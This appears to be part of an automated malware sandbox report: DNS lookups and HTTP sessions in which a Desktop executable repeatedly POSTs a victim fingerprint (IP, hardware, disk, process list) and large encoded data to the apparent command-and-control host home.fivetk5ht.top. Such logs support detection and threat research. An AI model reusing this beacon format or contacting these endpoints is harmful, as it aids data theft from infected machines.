                                                    Dec 20, 2024 16:56:23.212388992 CET192.168.2.101.1.1.10xeae2Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                    Dec 20, 2024 16:56:25.271193027 CET192.168.2.101.1.1.10xee9Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                    Dec 20, 2024 16:56:25.271254063 CET192.168.2.101.1.1.10x49f9Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                    Dec 20, 2024 16:56:26.993113995 CET192.168.2.101.1.1.10xe294Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                    Dec 20, 2024 16:56:26.993113995 CET192.168.2.101.1.1.10x59c6Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                    Dec 20, 2024 16:56:28.713457108 CET192.168.2.101.1.1.10x56c1Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                    Dec 20, 2024 16:56:28.713525057 CET192.168.2.101.1.1.10x212eStandard query (0)home.fivetk5ht.top28IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 20, 2024 16:56:20.331320047 CET1.1.1.1192.168.2.100xdb90No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                    Dec 20, 2024 16:56:20.331320047 CET1.1.1.1192.168.2.100xdb90No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                    Dec 20, 2024 16:56:23.498558998 CET1.1.1.1192.168.2.100x477bNo error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                    Dec 20, 2024 16:56:25.409362078 CET1.1.1.1192.168.2.100xee9No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                    Dec 20, 2024 16:56:27.137748957 CET1.1.1.1192.168.2.100xe294No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                    Dec 20, 2024 16:56:28.853946924 CET1.1.1.1192.168.2.100x56c1No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • httpbin.org
                                                    • home.fivetk5ht.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.1049705185.121.15.192803784C:\Users\user\Desktop\WP6s7cCLzr.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 20, 2024 16:56:23.748276949 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                    Host: home.fivetk5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 515753
                                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 31 38 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710181", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                    Dec 20, 2024 16:56:23.868788958 CET4944OUTData Raw: 33 46 70 76 2b 31 34 66 73 36 5c 2f 70 6a 56 4b 63 61 74 50 77 66 6a 4f 6e 4a 58 55 6f 2b 49 66 68 58 4a 50 37 75 4f 4c 70 72 5a 70 70 4f 4c 75 6d 6b 30 66 6b 50 52 58 37 4d 32 33 5c 2f 42 4a 51 58 48 5c 2f 4e 77 4f 7a 5c 2f 41 4c 70 54 75 5c 2f
                                                    Data Ascii: 3Fpv+14fs6\/pjVKcatPwfjOnJXUo+IfhXJP7uOLprZppOLumk0fkPRX7M23\/BJQXH\/NwOz\/ALpTu\/8Aekr\/AJx61+UXxI8IH4e\/EPx74BbUBqx8D+NPFPhA6qLU2I1M+GtcvtFOoCyNxdmzF6bL7SLU3d19n8zyvtE2zzG\/aPBX6V3gD9IjMs6yfwd49\/1wzHh3A4fM84w3+q\/GnD\/1PA4rEPC0K\/teKOHckoYj
                                                    Dec 20, 2024 16:56:23.868844986 CET4944OUTData Raw: 2f 72 5c 2f 77 44 50 38 71 44 6f 41 5c 2f 77 50 76 32 65 58 46 2b 36 6b 5c 2f 77 42 46 5c 2f 6c 36 39 6a 56 5a 5a 43 72 49 37 5c 2f 77 44 54 76 37 7a 5c 2f 41 50 48 31 39 65 76 30 71 7a 35 62 74 5c 2f 48 35 79 53 66 38 74 4f 6e 30 7a 6a 69 6d 76
                                                    Data Ascii: /r\/wDP8qDoA\/wPv2eXF+6k\/wBF\/l69jVZZCrI7\/wDTv7z\/APH19ev0qz5bt\/H5ySf8tOn0zjimvH82xH85BL3\/AOWP\/wCr\/wCv9QCMSP5j7\/MOP+WnmmDH8\/8APHNDMfL+dI4Ull83zI+3\/wBb\/POKFmXy02fO5iEX7yX9\/wD6YPT\/AD6AUH7v343T\/lr5cvkZ79s\/mPT6UAEny\/fTf\/215P8Anmq0c
                                                    Dec 20, 2024 16:56:23.869025946 CET2472OUTData Raw: 43 63 5c 2f 68 44 39 6e 4c 53 50 47 6d 74 5c 2f 45 76 78 64 38 51 39 54 68 2b 4a 58 68 7a 77 33 70 79 65 4b 5c 2f 44 5c 2f 41 4d 4d 4c 4d 61 58 62 36 76 70 66 69 4c 55 72 36 34 73 4c 5c 2f 77 41 49 65 41 66 44 47 73 52 54 53 74 6f 56 76 62 79 57
                                                    Data Ascii: Cc\/hD9nLSPGmt\/Evxd8Q9Th+JXhzw3pyeK\/D\/AMMLMaXb6vpfiLUr64sL\/wAIeAfDGsRTStoVvbyW7ai+nzQyytPZSzx2s1v\/ADe1++37Vnxu139oj\/gkF+zd8XPFEpuPE\/iX4h+EtL8S3zRpC2q+IvBVr8WvA2uay8UYWGJ9a1Xwxd6tJHAkduj3hW3iihCRr+Bvl+\/6f\/Xr+0PocZTjuH+AON+Hsya+vcP+K\/E
                                                    Dec 20, 2024 16:56:23.869379044 CET2472OUTData Raw: 35 66 37 75 5a 50 33 69 4a 50 46 2b 37 78 2b 58 5c 2f 36 5c 2f 5c 2f 77 42 64 54 62 66 4d 55 76 73 33 77 79 66 36 72 30 5c 2f 38 42 50 66 70 36 2b 6c 56 64 79 62 66 34 4e 6b 66 37 33 79 5c 2f 38 5c 2f 38 41 31 76 70 36 38 76 73 5c 2f 50 38 50 2b
                                                    Data Ascii: 5f7uZP3iJPF+7x+X\/6\/\/wBdTbfMUvs3wyf6r0\/8BPfp6+lVdybf4Nkf73y\/8\/8A1vp68vs\/P8P+CdArybZJkf5H8oeb5n+f\/wBfH0qGPetvsf8A5Zm483g5+vf\/AD+VXN2VdP8AU\/8ALX93n\/8AV\/nj0qnJ+7kdHFxA\/wDpEUvl8+n\/ANatDSn1+X6h5btI\/wAu\/wAvMufX9cVW+eT926eW\/wDyy8v+X6d
                                                    Dec 20, 2024 16:56:23.869467020 CET2472OUTData Raw: 5a 38 54 66 69 4e 34 4c 2b 4d 51 38 53 36 52 70 47 6e 5c 2f 44 72 51 62 31 4c 48 34 63 66 32 4e 6f 75 6b 65 48 37 50 54 42 4d 6d 71 33 75 72 2b 48 59 72 48 53 4c 47 7a 67 75 47 73 62 57 34 30 57 37 75 5a 32 47 59 4c 6d 2b 64 56 61 56 4c 68 56 74
                                                    Data Ascii: Z8TfiN4L+MQ8S6RpGn\/DrQb1LH4cf2NoukeH7PTBMmq3ur+HYrHSLGzguGsbW40W7uZ2GYLm+dVaVLhVt9qv0x8S6PpSeG9bji0+0t1ayvZT9mgjtiZZEZpJCYFjLPIxLOzZLsSWyTX5+T6CmC1vOUxk7Zhlf+\/igFQPdGOOp9f5Oz3xOyDivO8ZmlDJ1wvQxM6fs8vpP6zhqPJQo0ZTeIpQhKdbETpyxOKqyw1GM69apUavK
                                                    Dec 20, 2024 16:56:23.869601011 CET4944OUTData Raw: 48 5a 7a 68 73 79 78 64 5a 59 58 44 34 53 6c 6a 4b 74 57 4f 58 35 61 34 34 71 72 54 6f 52 6c 6a 4d 58 52 78 56 4b 74 57 71 33 71 79 6a 4b 70 56 71 53 66 78 48 34 76 5c 2f 5a 4d 5c 2f 77 43 43 6d 2b 73 36 56 38 50 72 54 77 70 5c 2f 77 56 75 5c 2f
                                                    Data Ascii: HZzhsyxdZYXD4SljKtWOX5a44qrToRljMXRxVKtWq3qyjKpVqSfxH4v\/ZM\/wCCm+s6V8PrTwp\/wVu\/4QzU\/Dng680Xx5q3\/DBf7P3iL\/hY\/i2bx9448Q2njX7BqXiSK38IfYvA2veC\/h5\/wjejNPplx\/wgX\/CWySjWPFOqwQ\/mB\/wW3\/5Or+H\/AP2b54U\/9WP8V6\/qPr+XD\/gtv\/ydX8P\/APs3zwp\
                                                    Dec 20, 2024 16:56:23.870770931 CET2472OUTData Raw: 6a 37 30 41 55 35 50 37 79 66 58 79 76 7a 4f 50 35 64 50 79 37 31 4a 35 69 43 54 5c 2f 41 46 50 6b 7a 54 5c 2f 76 63 5c 2f 36 37 6a 72 5c 2f 6f 6d 4d 5c 2f 35 34 39 4b 64 75 32 79 4a 73 6d 6a 64 50 7a 5c 2f 78 7a 5c 2f 54 46 51 72 49 59 5c 2f 4f
                                                    Data Ascii: j70AU5P7yfXyvzOP5dPy71J5iCT\/AFPkzT\/vc\/67jr\/omM\/549Kdu2yJsmjdPz\/xz\/TFQrIY\/OZ0k\/ef8+\/\/AD7jv\/8Aq7Vp7Ty\/H\/gANkx5e\/fI7+b\/AKuSX9x05\/8Arj1\/VD5fmf3\/APtl\/qeP8\/maev8AuSe\/mfuP88H25o+WRpndN7+b+6\/z2\/zwKzOgZ5br539+P\/pl+v8AWiRplkSH+D
                                                    Dec 20, 2024 16:56:23.988683939 CET4944OUTData Raw: 73 70 6c 56 68 6d 50 48 57 52 34 53 70 68 36 32 66 55 4d 52 54 71 31 71 6e 74 63 50 57 34 59 71 59 61 6e 6e 31 50 45 55 6f 30 70 56 4b 45 73 74 6c 6a 63 48 4b 74 37 57 4d 46 4b 6c 69 38 4e 57 6f 75 70 52 72 30 71 6b 5c 2f 77 42 6e 79 6a 36 50 66
                                                    Data Ascii: splVhmPHWR4Sph62fUMRTq1qntcPW4YqYann1PEUo0pVKEstljcHKt7WMFKli8NWoupRr0qk\/wBnyj6PfjXn0qayjw24nxyrYTLMfRlRwlLkr4LOMDjcyy\/FUKk68KdejXwWXZhWlOlKaoPBYqlifY1qFSnH6j\/Zl\/a9+Iv7Nuqi20938UfD6+uPO1vwJqN5JDaGRz8+paBeGO5bQtX4\/ezRW89lfp8mo2NzJHaXFp8jwr
                                                    Dec 20, 2024 16:56:23.988811970 CET4944OUTData Raw: 6c 57 48 69 6a 77 33 72 55 42 6c 38 4d 79 36 4c 72 47 69 61 33 5a 61 6a 6f 65 73 61 6c 47 74 32 74 72 2b 71 65 47 6e 45 50 67 44 77 62 68 38 48 77 68 34 62 35 37 6b 32 44 6f 63 53 34 2b 4f 63 59 50 4c 38 50 6d 6d 64 5a 71 73 66 6a 73 78 79 76 4a
                                                    Data Ascii: lWHijw3rUBl8My6LrGia3ZajoesalGt2tr+qeGnEPgDwbh8Hwh4b57k2DocS4+OcYPL8PmmdZqsfjsxyvJnTxCxua18fKi8Vls8l9jRniqNKbr4dUqX1jESVT8a8V+FvpM8f4jH8d+KnDmfZhiOEsseRY\/M8Tk+QZNLLstyzM87qVMNLL8mw2WrELB5gs9q4jEU8FiK1OlQxVSvW+p4RSpV\/7\/1\/qaZUq9W+v9TTWXHI6fy
                                                    Dec 20, 2024 16:56:23.988991976 CET4944OUTData Raw: 73 44 67 63 6a 77 6d 61 59 54 45 34 6d 76 68 4a 59 48 4c 63 58 6c 57 56 35 69 71 31 65 68 58 72 30 4d 52 68 4a 79 79 36 70 67 48 69 4a 63 76 48 65 43 5c 2f 6a 6e 71 74 70 65 66 73 55 65 4b 64 52 5c 2f 61 6e 66 77 4c 2b 7a 78 38 45 5c 2f 48 58 37
                                                    Data Ascii: sDgcjwmaYTE4mvhJYHLcXlWV5iq1ehXr0MRhJyy6pgHiJcvHeC\/jnqtpefsUeKdR\/anfwL+zx8E\/HX7B2t\/E79iiXQ\/2hrTWPh\/40+CHivwfL+0F8XbvRPCfw11n4HfFo+OPFvh\/xd8dLXxzb+Or\/AOL2vQeObfQdU8JW\/iLQ10tbXwG\/aVnvf2N\/DvwG+FOv\/AX4dJFpf7T2g\/HL4ZfGiy\/b40L4h\/FXxh4


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.1049706185.121.15.192803784C:\Users\user\Desktop\WP6s7cCLzr.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 20, 2024 16:56:25.530596972 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                    Host: home.fivetk5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 515753
                                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 31 38 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710181", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                    Dec 20, 2024 16:56:25.653808117 CET2472OUTData Raw: 33 46 70 76 2b 31 34 66 73 36 5c 2f 70 6a 56 4b 63 61 74 50 77 66 6a 4f 6e 4a 58 55 6f 2b 49 66 68 58 4a 50 37 75 4f 4c 70 72 5a 70 70 4f 4c 75 6d 6b 30 66 6b 50 52 58 37 4d 32 33 5c 2f 42 4a 51 58 48 5c 2f 4e 77 4f 7a 5c 2f 41 4c 70 54 75 5c 2f
                                                    Data Ascii: 3Fpv+14fs6\/pjVKcatPwfjOnJXUo+IfhXJP7uOLprZppOLumk0fkPRX7M23\/BJQXH\/NwOz\/ALpTu\/8Aekr\/AJx61+UXxI8IH4e\/EPx74BbUBqx8D+NPFPhA6qLU2I1M+GtcvtFOoCyNxdmzF6bL7SLU3d19n8zyvtE2zzG\/aPBX6V3gD9IjMs6yfwd49\/1wzHh3A4fM84w3+q\/GnD\/1PA4rEPC0K\/teKOHckoYj
                                                    Dec 20, 2024 16:56:25.653840065 CET2472OUTData Raw: 72 39 50 78 5c 2f 6f 61 5a 73 62 30 5c 2f 6c 5c 2f 6a 57 52 71 51 79 64 76 78 5c 2f 70 55 44 39 50 78 5c 2f 6f 61 74 31 47 7a 64 68 2b 4a 5c 2f 77 41 4b 31 68 74 38 5c 2f 77 42 45 64 6c 50 72 38 76 31 4b 64 52 79 64 76 78 5c 2f 70 55 37 39 66 77
                                                    Data Ascii: r9Px\/oaZsb0\/l\/jWRqQydvx\/pUD9Px\/oat1Gzdh+J\/wAK1ht8\/wBEdlPr8v1KdRydvx\/pU79fw\/qaZVmhXqOQfff8R\/8AXqzJ9xvpUVB0Feq8n+wm7H+e9XJO34\/0qt91u+P6H\/P6UHVS6f4f8hnTZ\/H0\/r\/n8e\/djfdf6j+S1Nu+\/wDwf5\/z16dT0plBsUz\/AMs\/w\/pUD9Px\/oau7G9P5f41DIrn
                                                    Dec 20, 2024 16:56:25.653906107 CET2472OUTData Raw: 2f 72 5c 2f 77 44 50 38 71 44 6f 41 5c 2f 77 50 76 32 65 58 46 2b 36 6b 5c 2f 77 42 46 5c 2f 6c 36 39 6a 56 5a 5a 43 72 49 37 5c 2f 77 44 54 76 37 7a 5c 2f 41 50 48 31 39 65 76 30 71 7a 35 62 74 5c 2f 48 35 79 53 66 38 74 4f 6e 30 7a 6a 69 6d 76
                                                    Data Ascii: /r\/wDP8qDoA\/wPv2eXF+6k\/wBF\/l69jVZZCrI7\/wDTv7z\/APH19ev0qz5bt\/H5ySf8tOn0zjimvH82xH85BL3\/AOWP\/wCr\/wCv9QCMSP5j7\/MOP+WnmmDH8\/8APHNDMfL+dI4Ull83zI+3\/wBb\/POKFmXy02fO5iEX7yX9\/wD6YPT\/AD6AUH7v343T\/lr5cvkZ79s\/mPT6UAEny\/fTf\/215P8Anmq0c
                                                    Dec 20, 2024 16:56:25.653944016 CET2472OUTData Raw: 70 58 77 50 5c 2f 61 45 76 66 6a 48 2b 77 72 38 59 66 68 6e 34 44 76 76 45 66 37 51 50 67 76 78 4c 71 58 77 4d 2b 4e 6c 78 34 44 38 50 61 70 38 52 76 68 66 38 54 66 43 5c 2f 68 75 35 31 68 34 4c 48 78 6b 2b 6c 76 34 70 30 5c 2f 77 41 4d 33 65 6c
                                                    Data Ascii: pXwP\/aEvfjH+wr8Yfhn4DvvEf7QPgvxLqXwM+Nlx4D8Pap8Rvhf8TfC\/hu51h4LHxk+lv4p0\/wAM3el6GuvGwttZt9MS98PX2kGykj8c6tKP8iPpyeIvGtfxN\/4hnHPI0+EMFguHuIcBlDy3K2oZ9Wy\/MsN9blmLwLzSTq0cdiKCoTxssHH2sZ\/V1OEakf7y+iLQzDKsVQzrhLM6HD3GHEVLNuFoZtiaNPHUMXh62KwOO
                                                    Dec 20, 2024 16:56:25.653956890 CET2472OUTData Raw: 43 63 5c 2f 68 44 39 6e 4c 53 50 47 6d 74 5c 2f 45 76 78 64 38 51 39 54 68 2b 4a 58 68 7a 77 33 70 79 65 4b 5c 2f 44 5c 2f 41 4d 4d 4c 4d 61 58 62 36 76 70 66 69 4c 55 72 36 34 73 4c 5c 2f 77 41 49 65 41 66 44 47 73 52 54 53 74 6f 56 76 62 79 57
                                                    Data Ascii: Cc\/hD9nLSPGmt\/Evxd8Q9Th+JXhzw3pyeK\/D\/AMMLMaXb6vpfiLUr64sL\/wAIeAfDGsRTStoVvbyW7ai+nzQyytPZSzx2s1v\/ADe1++37Vnxu139oj\/gkF+zd8XPFEpuPE\/iX4h+EtL8S3zRpC2q+IvBVr8WvA2uay8UYWGJ9a1Xwxd6tJHAkduj3hW3iihCRr+Bvl+\/6f\/Xr+0PocZTjuH+AON+Hsya+vcP+K\/E
                                                    Dec 20, 2024 16:56:25.653990030 CET2472OUTData Raw: 35 66 37 75 5a 50 33 69 4a 50 46 2b 37 78 2b 58 5c 2f 36 5c 2f 5c 2f 77 42 64 54 62 66 4d 55 76 73 33 77 79 66 36 72 30 5c 2f 38 42 50 66 70 36 2b 6c 56 64 79 62 66 34 4e 6b 66 37 33 79 5c 2f 38 5c 2f 38 41 31 76 70 36 38 76 73 5c 2f 50 38 50 2b
                                                    Data Ascii: 5f7uZP3iJPF+7x+X\/6\/\/wBdTbfMUvs3wyf6r0\/8BPfp6+lVdybf4Nkf73y\/8\/8A1vp68vs\/P8P+CdArybZJkf5H8oeb5n+f\/wBfH0qGPetvsf8A5Zm483g5+vf\/AD+VXN2VdP8AU\/8ALX93n\/8AV\/nj0qnJ+7kdHFxA\/wDpEUvl8+n\/ANatDSn1+X6h5btI\/wAu\/wAvMufX9cVW+eT926eW\/wDyy8v+X6d
                                                    Dec 20, 2024 16:56:25.654067993 CET2472OUTData Raw: 5a 38 54 66 69 4e 34 4c 2b 4d 51 38 53 36 52 70 47 6e 5c 2f 44 72 51 62 31 4c 48 34 63 66 32 4e 6f 75 6b 65 48 37 50 54 42 4d 6d 71 33 75 72 2b 48 59 72 48 53 4c 47 7a 67 75 47 73 62 57 34 30 57 37 75 5a 32 47 59 4c 6d 2b 64 56 61 56 4c 68 56 74
                                                    Data Ascii: Z8TfiN4L+MQ8S6RpGn\/DrQb1LH4cf2NoukeH7PTBMmq3ur+HYrHSLGzguGsbW40W7uZ2GYLm+dVaVLhVt9qv0x8S6PpSeG9bji0+0t1ayvZT9mgjtiZZEZpJCYFjLPIxLOzZLsSWyTX5+T6CmC1vOUxk7Zhlf+\/igFQPdGOOp9f5Oz3xOyDivO8ZmlDJ1wvQxM6fs8vpP6zhqPJQo0ZTeIpQhKdbETpyxOKqyw1GM69apUavK
                                                    Dec 20, 2024 16:56:25.654087067 CET2472OUTData Raw: 48 5a 7a 68 73 79 78 64 5a 59 58 44 34 53 6c 6a 4b 74 57 4f 58 35 61 34 34 71 72 54 6f 52 6c 6a 4d 58 52 78 56 4b 74 57 71 33 71 79 6a 4b 70 56 71 53 66 78 48 34 76 5c 2f 5a 4d 5c 2f 77 43 43 6d 2b 73 36 56 38 50 72 54 77 70 5c 2f 77 56 75 5c 2f
                                                    Data Ascii: HZzhsyxdZYXD4SljKtWOX5a44qrToRljMXRxVKtWq3qyjKpVqSfxH4v\/ZM\/wCCm+s6V8PrTwp\/wVu\/4QzU\/Dng680Xx5q3\/DBf7P3iL\/hY\/i2bx9448Q2njX7BqXiSK38IfYvA2veC\/h5\/wjejNPplx\/wgX\/CWySjWPFOqwQ\/mB\/wW3\/5Or+H\/AP2b54U\/9WP8V6\/qPr+XD\/gtv\/ydX8P\/APs3zwp\
                                                    Dec 20, 2024 16:56:25.654233932 CET2472OUTData Raw: 56 32 58 62 6a 76 6d 6d 31 59 71 4a 2b 76 34 66 31 4e 42 71 4d 71 43 53 50 35 65 75 66 77 5c 2f 77 41 39 65 6c 54 30 55 48 51 55 70 49 5c 2f 6c 34 34 2b 76 66 5c 2f 50 54 36 66 71 79 70 6e 2b 36 66 77 5c 2f 6d 4b 68 6f 4f 67 68 35 59 5c 2f 77 43
                                                    Data Ascii: V2Xbjvmm1YqJ+v4f1NBqMqCSP5eufw\/wA9elT0UHQUpI\/l44+vf\/PT6fqypn+6fw\/mKhoOgh5Y\/wCeKZ\/Gn1NSydvx\/pUdB2U+vyIfmb1P8v8ADNRtGnuE6f5z\/npVqo5O34\/0oHDb5\/oinJF\/cHr2\/oP8fXmq0iujH+P9f8n0PX1q\/J\/ufz\/\/AF+voBTP4fuR\/wCefp+GM+3eg39p5fj\/AMAofP8A8tO
                                                    Dec 20, 2024 16:56:25.654262066 CET2472OUTData Raw: 6a 37 30 41 55 35 50 37 79 66 58 79 76 7a 4f 50 35 64 50 79 37 31 4a 35 69 43 54 5c 2f 41 46 50 6b 7a 54 5c 2f 76 63 5c 2f 36 37 6a 72 5c 2f 6f 6d 4d 5c 2f 35 34 39 4b 64 75 32 79 4a 73 6d 6a 64 50 7a 5c 2f 78 7a 5c 2f 54 46 51 72 49 59 5c 2f 4f
                                                    Data Ascii: j70AU5P7yfXyvzOP5dPy71J5iCT\/AFPkzT\/vc\/67jr\/omM\/549Kdu2yJsmjdPz\/xz\/TFQrIY\/OZ0k\/ef8+\/\/AD7jv\/8Aq7Vp7Ty\/H\/gANkx5e\/fI7+b\/AKuSX9x05\/8Arj1\/VD5fmf3\/APtl\/qeP8\/maev8AuSe\/mfuP88H25o+WRpndN7+b+6\/z2\/zwKzOgZ5br539+P\/pl+v8AWiRplkSH+D


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.1049708185.121.15.192803784C:\Users\user\Desktop\WP6s7cCLzr.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 20, 2024 16:56:27.261384964 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                    Host: home.fivetk5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 515753
                                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 31 38 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
